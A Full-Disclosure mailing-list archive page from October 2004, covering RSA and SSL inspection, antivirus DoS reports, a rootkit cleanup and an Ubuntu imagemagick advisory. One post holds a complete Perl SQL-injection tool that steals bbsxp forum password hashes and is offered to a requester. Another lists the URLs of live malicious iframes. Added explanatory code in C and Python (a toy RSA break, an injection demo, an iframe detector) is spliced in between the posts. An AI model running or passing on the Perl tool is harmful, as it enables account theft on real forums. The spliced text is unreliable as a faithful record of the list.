> Subject: Re: [Full-Disclosure] Possibly a stupid question RPC
> over HTTP
>
>[snip]
>
> You're talking about solving a problem that DOESN'T EXIST BY
> DEFINITION. Re-read my response -- this time without being stupid --
> and you'll see that I was trying to explain to you that the problem is
> the general factoring of large numbers (into primes for what should be
> obvious reasons). This is NOT the same as factoring large primes as
> that's a solved problem. If this is still difficult to understand, any
> handy grade-school maths book should provide additional explanation.
> Testing for primality, which is a related but different problem, is
> solved, but proving that a number is composite is unfortunately not
> the same as knowing its factors.
> </flame>
>
> As to the question of whether this is a solved problem: we may have to
> agree to disagree; if it were the NSA, given their past interactions
> with the crypto community, I think it likely that they'd have over
> time moved to another type of cryptography. BTW, brute forcing a key
> does not break the system -- and as others have shown in this thread,
> it's impossible to precompute all the keys unless you've broken every
> single PRNG out there, and that's even less likely.

What is it with this list that people can't reply without being rude? Is it the phase of the moon or something? OK, so we can rule out brute force, as storing every prime that's possible with 512bit keys isn't possible in this universe. Anyway, to quote RSA Laboratories:

"The RSA algorithm works as follows: take two large primes, p and q, and compute their product n = pq; n is called the modulus. Choose a number, e, less than n and relatively prime to (p-1)(q-1), which means e and (p-1)(q-1) have no common factors except 1. Find another number d such that (ed - 1) is divisible by (p-1)(q-1). The values e and d are called the public and private exponents, respectively. The public key is the pair (n, e); the private key is (n, d). The factors p and q may be destroyed or kept with the private key.

It is currently difficult to obtain the private key d from the public key (n, e). However if one could factor n into p and q, then one could obtain the private key d. Thus the security of the RSA system is based on the assumption that factoring is difficult" (http://www.rsasecurity.com/rsalabs/node.asp?id=2214)

Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off.
(Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys).

Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else.

This is my last post on the matter which is solely for the purpose of making at least one post in this thread sensible and useful for future readers of the archive. All future abusive emails on my mathematical abilities will be deleted without response.

--
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Aireyrnib.org.uk

Tag line temporarily removed due to several people being unable and/or unwilling to comprehend what I'm talking about.

--
DISCLAIMER:

NOTICE: The information contained in this email and any attachments is
confidential and may be privileged. If you are not the intended
recipient you should not use, disclose, distribute or copy any of the
content of it or of any attachment; you are requested to notify the
sender immediately of your receipt of the email and then to delete it
and any attachments from your system.

RNIB endeavours to ensure that emails and any attachments generated by
its staff are free from viruses or other contaminants. However, it
cannot accept any responsibility for any such which are transmitted.
We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email and
any attachments are those of the author and do not necessarily represent
those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
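The construction quoted from RSA Labs, carried through on numbers small enough to factor by trial division, as an added C example that is not part of the thread or of RSA Labs' text: it derives d from p, q and e exactly as described, then recovers the same d from nothing but the public key (n, e) by factoring n, which is the step the quote says is assumed to be hard. The primes and message are constructed; moduli stay below 2^32 so every product fits in uint64_t and no bignum library is needed.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not from the thread or RSA Labs: toy RSA on 64-bit
 * integers plus the attacker's step, factoring n. Numbers are constructed. */

static uint64_t gcd64(uint64_t a, uint64_t b) {
    while (b) { uint64_t t = a % b; a = b; b = t; }
    return a;
}

/* Square-and-multiply: base^exp mod m, for m < 2^32. */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t m) {
    uint64_t r = 1;
    base %= m;
    while (exp) {
        if (exp & 1) r = r * base % m;
        base = base * base % m;
        exp >>= 1;
    }
    return r;
}

/* d = e^-1 mod phi by the extended Euclidean algorithm; 0 if gcd(e, phi) != 1. */
uint64_t modinv(uint64_t e, uint64_t phi) {
    int64_t t = 0, newt = 1, r = (int64_t)phi, newr = (int64_t)e;
    while (newr) {
        int64_t q = r / newr, tmp;
        tmp = t - q * newt; t = newt; newt = tmp;
        tmp = r - q * newr; r = newr; newr = tmp;
    }
    if (r != 1) return 0;
    return (uint64_t)(t < 0 ? t + (int64_t)phi : t);
}

/* Key generation as the quote describes it: n = pq, e coprime to (p-1)(q-1),
 * d the inverse of e mod (p-1)(q-1). Returns d, or 0 if e is unsuitable. */
uint64_t rsa_keygen_d(uint64_t p, uint64_t q, uint64_t e) {
    uint64_t phi = (p - 1) * (q - 1);
    if (e >= p * q || gcd64(e, phi) != 1) return 0;
    return modinv(e, phi);
}

/* Trial division. This "breaks" RSA here only because n is tiny; for a
 * real modulus this loop is the hard problem the quote refers to. */
static uint64_t smallest_factor(uint64_t n) {
    for (uint64_t p = 2; p * p <= n; p++)
        if (n % p == 0) return p;
    return 0;
}

/* The attack in the quote: once n is factored into p and q, d follows from (n, e). */
uint64_t recover_d_from_public_key(uint64_t n, uint64_t e) {
    uint64_t p = smallest_factor(n);
    return p ? rsa_keygen_d(p, n / p, e) : 0;
}

uint64_t rsa_encrypt(uint64_t m, uint64_t e, uint64_t n) { return modpow(m, e, n); }
uint64_t rsa_decrypt(uint64_t c, uint64_t d, uint64_t n) { return modpow(c, d, n); }

int main(void) {
    uint64_t p = 1009, q = 1013, e = 65537, n = p * q;   /* constructed toy key */
    uint64_t d = rsa_keygen_d(p, q, e);
    uint64_t c = rsa_encrypt(123456, e, n);
    printf("n=%" PRIu64 " e=%" PRIu64 " d=%" PRIu64 "\n", n, e, d);
    printf("decrypt(encrypt(123456)) = %" PRIu64 "\n", rsa_decrypt(c, d, n));
    printf("d recovered from (n, e) alone: %" PRIu64 "\n", recover_d_from_public_key(n, e));
    return 0;
}
```

Everything an attacker needs is in `recover_d_from_public_key`; the only thing standing between a public key and its private exponent is the cost of `smallest_factor` at real key sizes, which is the point being argued in the thread.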


 
[Full-Disclosure] Presentation / Paper : Demystifying Penetration Testing

From: Debasis Mohanty (mailhackingspirits.com)
Date: Tue Oct 26 2004 - 12:04:21 CDT


Hi All,

This is to announce the release of a presentation / paper on PenTesting
by HACKINGSPIRITS called "Demystifying Penetration Testing". It is
mostly targeted at those who are new to Penetration Testing (i.e.
Security Officers / Sys Admins / Security Auditors / Security
Enthusiasts, etc.). This presentation will give a clear picture of how pen
testing is done and what the expected results are. Various screenshots
are provided as proofs of concept to give a brief picture of possible
end-results.

The goals of this presentation / paper are as follows:

- An overview of how Vulnerability Assessment (VA) & Penetration Testing
(PT) is done
- Defining scope of the assessment
- Types of Penetration Testing
- A brief understanding on how Buffer Overflow works
- How vulnerabilities are scanned and exploited
- What are the end results
- What a Penetration Testing Report should contain

 

It can be downloaded from the following link:
http://www.hackingspirits.com/eth-hac/papers/whitepapers.asp

Debasis Mohanty
www.hackingspirits.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

From: bipin gautam (visitbipinyahoo.com)
Date: Tue Oct 26 2004 - 12:09:16 CDT


Yeah, I've been seeing this behaviour for a long time,
but I don't think there is anything serious. Firefox
only slows down (using 100% CPU) if you are using a
slow PC, and after the binary file has been completely
loaded, everything works normally......

Frankly, there are a lot of similar bugs. If you
open multiple windows and multiple tabs at once,
Firefox locks/reserves the memory (pagefile) that it is
using even when some of the tabs are closed. You have
to restart Mozilla (close all the open windows) to
free the memory.

huh, nothing serious isn't it......

bipin

                
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Multiple AV DoS (part v)

From: bipin gautam (visitbipinyahoo.com)
Date: Tue Oct 26 2004 - 12:24:53 CDT


Finally, most AV software seems to handle ZIP ARCHIVE
BOMBS easily. Lately, I was impressed with McAfee
Antivirus. But what a pity, many AVs still die (DoS)
while scanning compressed oversized executables.

http://www.geocities.com/visitbipin/oversize_exe.zip

Currently I know,

Norton AV 2002/2003/2004 Pro.
McAfee 4396
Sybari 7.5.1314
TrendMicro 7.000

......SHOULD BE vulnerable to this bug. I also confirmed
it using www.virustotal.com

WHAT A PITY. I wonder when AV software will
improve...

bipin gautam

http://www.geocities.com/visitbipin

                
__________________________________
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.
http://mobile.yahoo.com/maildemo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
SV: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

From: Peter Kruse (krusekrusesecurity.dk)
Date: Tue Oct 26 2004 - 12:37:01 CDT


Hi Bipin,

It's not rated as a serious risk, is it? Simply a DoS.

This is not solely related to trivial memory consumption, either. The
scenario you're describing has been around for ages and is related to system
resources. This is not.

Regards
Peter Kruse

>-----Original Message-----
>From: bipin gautam [mailto:visitbipinyahoo.com]
>Sent: 26 October 2004 19:09
>To: pkrcsis.dk
>Cc: full-disclosurelists.netsys.com
>Subject: Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla
>Firefox stop responding or crash
>
>
>Yeah, I've been seeing this behavior for a long time...
>but I don't think there is anything serious. Firefox
>only slows down (using 100% CPU) if you are using a
>slow PC. And after the binary file has completely
>loaded, everything works normally......
>
>Frankly, there are a lot of such similar bugs. If you
>open multiple windows and multiple tabs at once,
>Firefox locks/reserves the memory (pagefile) that it's
>using even when some of the tabs are closed. You have
>to restart Mozilla (close all the open windows) to
>free the memory.
>
>Huh, nothing serious, isn't it......
>
>bipin
>
>
>
>
>__________________________________
>Do you Yahoo!?
>Yahoo! Mail Address AutoComplete - You start. We finish.
>http://promotions.yahoo.com/new_mail
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Php Nuke Hack's

From: .:: DarkDelphi ::. (darkydelphigmail.com)
Date: Tue Oct 26 2004 - 13:18:51 CDT


Hi, I'm a Spanish reader and.. I will try to expose myself..

I need to hack one site I created myself with php-nuke. This site is
hosted on my computer to test the security of Php Nuke. I recently
used some hacks like SQL Injection, Cross-Site Scripting and cookie
kidnapping(?) (this last one without good results...)

I use the hacks that I found at
http://packetstorm.security-guide.de/assess/ ... Can anyone write or
send more hacks?

Thanks

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Php Nuke Hack's

str0kemilw0rm.com
Date: Tue Oct 26 2004 - 14:29:33 CDT


Please don't expose yourself.

This is all I got for you.

http://www.milw0rm.com/search.php?dong=php-nuke

On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::.
<darkydelphigmail.com> wrote:
> Hi, I'm a Spanish reader and.. I will try to expose myself..
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Php Nuke Hack's

From: ntx0f (ntx0fseteuid.com)
Date: Tue Oct 26 2004 - 15:29:05 CDT


ever consider writing one yourself?

----- Original Message -----
From: <str0kemilw0rm.com>
To: <full-disclosurelists.netsys.com>
Cc: <darkydelphigmail.com>
Sent: Tuesday, October 26, 2004 3:29 PM
Subject: [Full-Disclosure] Php Nuke Hack's

> Please don't expose yourself.
>
> This is all I got for you.
>
> http://www.milw0rm.com/search.php?dong=php-nuke
>
> On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::.
> <darkydelphigmail.com> wrote:
> > Hi, I'm a Spanish reader and.. I will try to expose myself..
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Php Nuke Hack's

From: bug free (bugfreegmail.com)
Date: Tue Oct 26 2004 - 15:56:07 CDT


>Please don't expose yourself.
>This is all I got for you.
>http://www.milw0rm.com/search.php?dong=php-nuke

That is not very cool. See my crack tool for the bbsxp forum. It works
well on 5.00, 4.0beta3 and beta4. Running the crack is just like watching a
movie. It will register a user and get the password for you
automatically. ;)

--
Thanks
bugfree

#!/usr/bin/perl
#############################################
# This tool is used to crack bbsxp 5.00 (Access, MSSQL)
# Developed by bugfree ( www.xxxxxx.org )
# Thanks to theAres for his help on debugging
#############################################

use IO::Socket;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Cookies;
use LWP;
use LWP::UserAgent;
use HTML::Form;

$version='1.0';
#$username = 'test';
#$password = 'testt';
$namepass = 'test:test';
$username2 = 'zgtqwpmz123';
$password2 = 'gbhnjm';
$fLoginFail = 0;
$fRegistFail =0;

%options=();
getopts("h:u:",\%options);
(defined $options{h} ) || die "Usage(version:" . $version . "):
$0\n\t-h www.abc.com/bbs/\n\t-u username:password\n";
                                                                                
$tmpUrl = $options{h} if defined $options{h};
$namepass = $options{u} if defined $options{u};
@str = split(":", $namepass);
$username = $str[0];
$password = $str[1];

if ( $tmpUrl =~ /(http:\/\/)?([a-z0-9.]+)\/(.*)/i ) {
        $webhost = $2;
        $webdir = $3;
        $webUrl = $webhost . '/' . $webdir .'/';
        $webUrl =~ s/\/\//\//;
        $webUrl = 'http://' . $webUrl;
}
else {
        die "Please use format: -h http://www.target.com/bbs/";
}

print "SQL injection for URL: $webUrl \n";

#Global URL
my $loginPage = $webUrl . 'login.asp';
my $searchPage = $webUrl . 'search.asp';
my $registPage = $webUrl . 'register.asp';

my $cookies = HTTP::Cookies->new();
my $ua = LWP::UserAgent->new;
$ua->cookie_jar( $cookies );

#loginRegist();
webLogin( $username, $password );
if ( $fLoginFail == 1 ) {
        loginRegist( $username2, $password2 ); #try 2nd user
        if ( $fRegistFail == 1 ) {
                $fLoginFail = 0;
                webLogin( $username2, $password2 );
                if ( $fLoginFail == 1 ) { die "Sorry, Can not login to web \n"; }
        }
        
}

#sql injection
webSearch();

######################
# Functions list
# loginRegist() :register to bbs
# webLogin() : web login
# webSearch() : SQL injection through the search page
######################

sub webSearch
{
        # SQL injection string; leave a space at the end
        $searchxm = 'forumid=0 union all SELECT 1, forum.forumid,
user.userpass, user.username, forum.content, forum.posttime,
forum.postip, forum.replies, forum.Views, forum.icon, forum.goodtopic,
forum.toptopic, forum.locktopic, forum.deltopic, forum.lastname,
forum.lasttime, clubconfig.adminpassword, forum.pollresult ,
forum.multiplicity FROM [user],forum, clubconfig where user.membercode
> 3 OR user.username ';
        
        
        $request = POST ( $searchPage . '?menu=ok' ,
                [
                content => 'abcd',
                search => 'author',
                searchxm => $searchxm,
                searchxm2 => 'topic',
                TimeLimit => '1',
                forumid =>''
                ],
                Referer => $searchPage,
                Connection => 'Keep-Alive',
                'User-Agent' => 'Mozilla/4.0',
                Host => $webhost
                );
        
        $response = $ua->request( $request );
        
        if ( $response->as_string =~ /HTTP\/1.[01] 200/ )
        {
                print "search Success\n";
                %passwdGet = ();
                @htmlOut = split("\n", $response->as_string);
                foreach $v (@htmlOut)
                {
                        if ( $v =~ /<script>ShowForum\("\d+","([A-Z0-9]{32,32})",".*?","(.*?)",.*<\/script>/
)
                        {
                                $passwdGet{$1}=$2;
                                #print "\tUsername: $2\n\tMD5 passwd: $1" . "\n";
                        }
                }
                while ( my ( $key, $value ) = each %passwdGet )
                {
                        print "\tusername: $value\n\tMD5 passwd: $key\n";
                }
        }
        else
        {
                print $response->as_string. "\n";
                die "search Failed\n";
        }
        
}

sub loginRegist
{

        $myusername = $_[0];
        $mypassword = $_[1];

        $request = POST ( $registPage,
               [
        username => $myusername,
        password => $mypassword,
        userpass2 => $mypassword,
        usermail => 'frfr.com',
        realname => 'baby',
        userface => 'images/face70.gif',
        birthday => '',
        perlsonal => '',
        sign => '',
        sex => '',
        country => '',
        province => '',
        city => '',
        blood => '',
        belief => '',
        occupation => '',
        marital => '',
        education => '',
        college => '',
        userqq => '',
        icq => '',
        usrehome => '',
        question => '',
        answer => ''
        ],
        Referer => $registPage,
        Connection => 'Keep-Alive',
        'User-Agent' => 'Mozilla/4.0',
        Host => $webhost,
        );

        $response = $ua->request( $request );
        $cookies->extract_cookies( $response );

        if ( $response->as_string =~ /HTTP\/1.[01] 200/ )
        {
                print "Register Success ($myusername, $mypassword)\n";
        }
        else
        {
                $fRegistFail = 1;
                print "Register Failed ($myusername, $mypassword)\n";
        }
}

sub webLogin
{
        $myusername = $_[0];
        $mypassword = $_[1];

        my $request = POST ( $loginPage,
                [ menu => 'add',
                        username => $myusername,
                        userpass=> $mypassword
                ],
                Referer => $loginPage,
                Connection => 'Keep-Alive',
                'User-Agent' => 'Mozilla/4.0',
                Host => $webhost
                );
        
        $response = $ua->request( $request );
        $cookies->extract_cookies( $response );
        
        if ( $response->as_string =~ /HTTP\/1.[01] 200/ )
        {
                print "Login Success($myusername, $mypassword)\n";
        }
        else
        {
                $fLoginFail = 1;
                print "Login Failed($myusername, $mypassword)\n";
        }
}
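The injected `searchxm` value above works because the forum pastes a client-supplied fragment straight into its SQL text, and the trailing `UNION` pulls `userpass` rows back through the ordinary search results. The same defect beside its fix, as an added example in Python against SQLite (not the bbsxp code, which is ASP, and not part of bugfree's post): the table layout, the sample hash, the handler names and the payload string are constructed for the illustration.

```python
"""Added example (not from the post): a search handler with the defect
the tool above exploits, beside a parameterized version.
Schema, rows and names are constructed for illustration."""
import sqlite3

# Constructed sample hash (MD5 of "password"); not a real account.
SAMPLE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE user(username TEXT, userpass TEXT, membercode INTEGER);
        CREATE TABLE forum(forumid INTEGER, content TEXT);
        INSERT INTO user VALUES ('admin', '{SAMPLE_HASH}', 9);
        INSERT INTO forum VALUES (1, 'welcome thread');
    """)
    return con


def search_vulnerable(con, forumid, term):
    """Client-supplied forumid is interpolated into the statement, so a
    value like INJECTED_FORUMID rewrites the query: the appended UNION
    adds rows from the user table to the search result."""
    sql = (f"SELECT forumid, content FROM forum "
           f"WHERE content LIKE '%{term}%' AND forumid = {forumid}")
    return con.execute(sql).fetchall()


def search_safe(con, forumid, term):
    """Validate the type first, then bind every value as a parameter; the
    SQL text is fixed and user data can only be compared, never parsed."""
    try:
        forumid = int(forumid)
    except (TypeError, ValueError):
        raise ValueError("forumid must be an integer") from None
    sql = "SELECT forumid, content FROM forum WHERE content LIKE ? AND forumid = ?"
    return con.execute(sql, (f"%{term}%", forumid)).fetchall()


# Same shape as the payload in the tool: a UNION that selects user.userpass.
INJECTED_FORUMID = "0 UNION ALL SELECT 1, userpass FROM user WHERE membercode > 3"


def demo():
    con = make_db()
    leaked = search_vulnerable(con, INJECTED_FORUMID, "abcd")
    try:
        search_safe(con, INJECTED_FORUMID, "abcd")
        blocked = False
    except ValueError:
        blocked = True
    return {
        "leaked_rows": leaked,            # password hash returned as a "post"
        "injection_blocked": blocked,     # parameterized handler refuses it
        "normal_result": search_safe(con, 1, "welcome"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The type check on `forumid` is what rejects this particular payload, but the parameter binding is the real fix: even a column that legitimately takes free text (the search term here) cannot change the statement once it is passed as a bound value.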

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Tue Oct 26 2004 - 18:22:06 CDT


Finally, I cleaned the compromised box of my friend :))
I've found (following many helpful suggestions from people on the FD list)
that a variant of the "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it :((((
in any way, and they said that everything is OK.

To find suckit and deactivate it I used this:
http://tsd.student.utwente.nl/skdetect/
It's code based on the suckit source code, but without the malware part.
It can dig into /dev/kmem and explore sys_call_table[];
skdetect was able to find suckit installed.
Another person who was compromised by the "xpire.info" hacker told me
that the symptoms were the same, and on his host too he found this suckit
variant installed.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After the reboot everything came back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually, on the "xpire.info/fa/?d=get" malware page you can find these exploits
in the wild:

#IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME#
#iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe#
#iframe src="http://213.159.117.133/dl/adv121.php" width=1
height=1></iframe#
!-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME#
//-->

There are a lot of backdoors/trojans ready to install, and the bad news is that
most of this malware is recompiled, so many AVs are fooled and don't catch them
(for example Symantec and ClamAV don't recognize much of the malware
on this site, after a quick test made with www.virustotal.com)

Bye,
EF
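The list above is the shape a defender can scan a page for: iframes sized 0x0 or 1x1 that load content from some other host. Added example (not from EF's post): a small detector built on the Python standard library's HTML parser. The page host, the sample markup and the host names in it are constructed for the illustration and are not the sites named above; the commented-out entry is kept because a browser never loads it and the detector should not flag it either.

```python
"""Added example (not from the post): flag iframes that are sized to be
invisible or that pull content from another host, the pattern shown in
the defanged snippet above. Sample markup and hosts are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _dimension(value):
    """Pixel size of a width/height attribute; anything non-numeric
    (missing, '100%') is treated as visible so it is never mis-flagged."""
    try:
        return int(str(value).strip())
    except (TypeError, ValueError):
        return None


class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":            # HTMLParser lower-cases tag/attr names
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        reasons = []
        w, h = _dimension(a.get("width")), _dimension(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("near-zero size")
        host = (urlparse(src).hostname or "").lower()
        if host and host != self.page_host:
            reasons.append(f"off-site host {host}")
        if reasons:
            self.findings.append((src, reasons))
    # Markup inside <!-- --> reaches handle_comment, not handle_starttag,
    # so a commented-out iframe (which the browser never loads) is skipped.


def find_hidden_iframes(html, page_host):
    p = HiddenIframeFinder(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page, mirroring the shape of the snippet above.
SAMPLE_HTML = """<html><body><p>welcome</p>
<IFRAME SRC="http://hidden.example/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>
<iframe src="http://hidden.example/t3.htm" width=1 height=1></iframe>
<iframe src="http://192.0.2.10/dl/adv121.php" width=1 height=1></iframe>
<iframe src="http://www.example.org/player.htm" width=640 height=480></iframe>
<!-- <iframe src="http://hidden.example/old.htm" width=1 height=1></iframe> -->
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_HTML, "www.example.org"):
        print(src, "->", ", ".join(reasons))
```

Size and host are reported separately because either alone is a weaker signal: a same-host 1x1 frame is often a tracking pixel, and an off-site frame of normal size is usually an embedded player; both conditions together are what the snippet above shows.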

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

From: Kevin (KKadowgmail.com)
Date: Tue Oct 26 2004 - 23:34:15 CDT


On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John <john.aireyrnib.org.uk> wrote:
> Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off.
> (Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys).

Agreed. Current SSL standards rely on public key encryption methods
which obtain their strength from the difficulty of the factoring
problem.

> Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else.

Yes -- however, there are workarounds.
If you control one end point or the other, you can take steps to
permit examination of the contents of SSL sessions.

Server:
If you control the server, you can of course load the keys into the
sniffer (risky, but not unheard of; see
http://www.radware.com/content/products/ct100/default.asp) or
terminate the SSL session on a device under your control. (For an
RPC-over-HTTP example, see this document:
http://www.msexchange.org/pages/article_p.asp?id=613)

Client:
If you control the client (say a corporate desktop PC), you have
another option -- you can modify the client's list of trusted CAs and
force the client to establish the SSL session to your proxy server.
This gives the proxy an opportunity to inspect/log/modify the
cleartext contents of the session. The proxy establishes its own SSL
session to the remote server normally; neither the client nor the server
would be aware of the MITM.

A freeware implementation of this MITM approach was "Achilles"; I have
also seen at least one commercial product offering this functionality
to permit content-scanning of outbound HTTPS browser traffic.

Kevin Kadow

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [USN-7-1] imagemagick vulnerability

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:52:42 CDT


===========================================================
Ubuntu Security Notice USN-7-1 October 27, 2004
imagemagick vulnerability
CAN-2004-0981
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libmagick6

The problem can be corrected by upgrading the affected package to
version 5:6.0.2.5-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow in imagemagick's EXIF parsing routine has been
discovered in imagemagick versions prior to 6.1.0. Trying to query
EXIF information of a malicious image file might result in execution
of arbitrary code with the user's privileges.

Since imagemagick can be used in custom printing systems, this also
might lead to privilege escalation (execute code with the printer
spooler's privileges). However, Ubuntu's standard printing system does
not use imagemagick, thus there is no risk of privilege escalation in
a standard installation.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1.diff.gz
      Size/MD5: 128252 ec2de08007787f6dceb8048fa381c269
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1.dsc
      Size/MD5: 874 fbd1bde2b883b5e1f6d3c3608baf97f2
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5.orig.tar.gz
      Size/MD5: 6700454 207fdb75b6c106007cc483cf15e619ad

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 1365882 4a7e2a576a514058945e26a1fbfbaf61
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 226096 8a0cb4adfa863f7917494539793cad37
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 160490 58a31d1a58a09e11135d6864afe07dd6
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 1518994 1e261e47415a33e272c906c69b72be9f
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 1166704 334a3099dce3e9ca8aa5b450452339a9
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 138348 9e58147cb448c7cb74916f5ff5638c52

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 1365782 da2ebba8bac45b8fb83033aa7d530c57
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 206254 9f762b26048e7ad4dc208834f6d77312
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 162540 eb64e055ba51901960dde16af468bbdc
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 1425038 e50228507fdfbefcd6176b756040bca4
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 1115170 8af906dc32e2dee6a5c171dc0444557f
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 136900 41773f2582175646942845dc28c44011

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 1371144 f0d39986f275d1119268da7affcc34e3
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 224970 15be8f07f8a697d6665f27d504dba9f1
